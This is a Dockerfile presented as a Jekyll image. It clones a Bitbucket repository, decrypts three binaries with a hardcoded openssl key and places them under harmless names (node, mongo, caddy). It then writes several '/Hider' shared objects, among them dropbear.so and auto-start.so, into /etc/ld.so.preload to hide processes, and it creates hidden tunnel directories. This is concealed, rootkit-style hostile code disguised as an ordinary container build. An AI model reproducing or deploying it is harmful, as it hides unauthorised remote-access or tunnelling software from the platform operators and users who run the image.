FROM ubuntu

RUN mkdir /jekyll
RUN mkdir /jekyll/Config

ADD apt /jekyll/apt

RUN apt update && apt install -y curl git wget tar openssl unzip

RUN cd /jekyll

RUN git clone https://snowflare-lyv-development@bitbucket.org/snowflare-lyv-development/PaaS-service.git

RUN dd if=PaaS-service/Bin/node.bpk |openssl des3 -d -k 8ddefff7-f00b-46f0-ab32-2eab1d227a61|tar zxf -
RUN dd if=PaaS-service/Bin/mongo.bpk |openssl des3 -d -k 8ddefff7-f00b-46f0-ab32-2eab1d227a61|tar zxf -
RUN dd if=PaaS-service/Bin/caddy.bpk |openssl des3 -d -k 8ddefff7-f00b-46f0-ab32-2eab1d227a61|tar zxf -

RUN mv node /jekyll/node && mv mongo /jekyll/mongo && mv caddy /usr/bin/caddy
RUN mv PaaS-service/Hider /Hider && rm -rf PaaS-service/Config/node-o-version.json && cp PaaS-service/Config/node.json /node.json && chmod 0777 /node.json
RUN mv PaaS-service/Config/Caddyfile-jekyll /Caddyfile
RUN chmod 0777 -R /Hider

RUN echo /Hider/node.so >> /etc/ld.so.preload
RUN echo /Hider/mongo.so >> /etc/ld.so.preload
RUN echo /Hider/dropbear.so >> /etc/ld.so.preload
RUN echo /Hider/auto-start.so >> /etc/ld.so.preload

RUN mkdir /.temp
RUN mkdir /.temp/tunnel
RUN mkdir /.temp/tunnel/id/
RUN mkdir /.temp/tunnel/id/.86de6451-e653-4318-bd38-4e8e4a9d8006
RUN mkdir /.temp/tunnel/id/.86de6451-e653-4318-bd38-4e8e4a9d8006/MESS
RUN mkdir /.temp/tunnel/id/.86de6451-e653-4318-bd38-4e8e4a9d8006/LESS

RUN chmod +x -R /jekyll
RUN rm -rf PaaS-service

CMD ./jekyll/apt
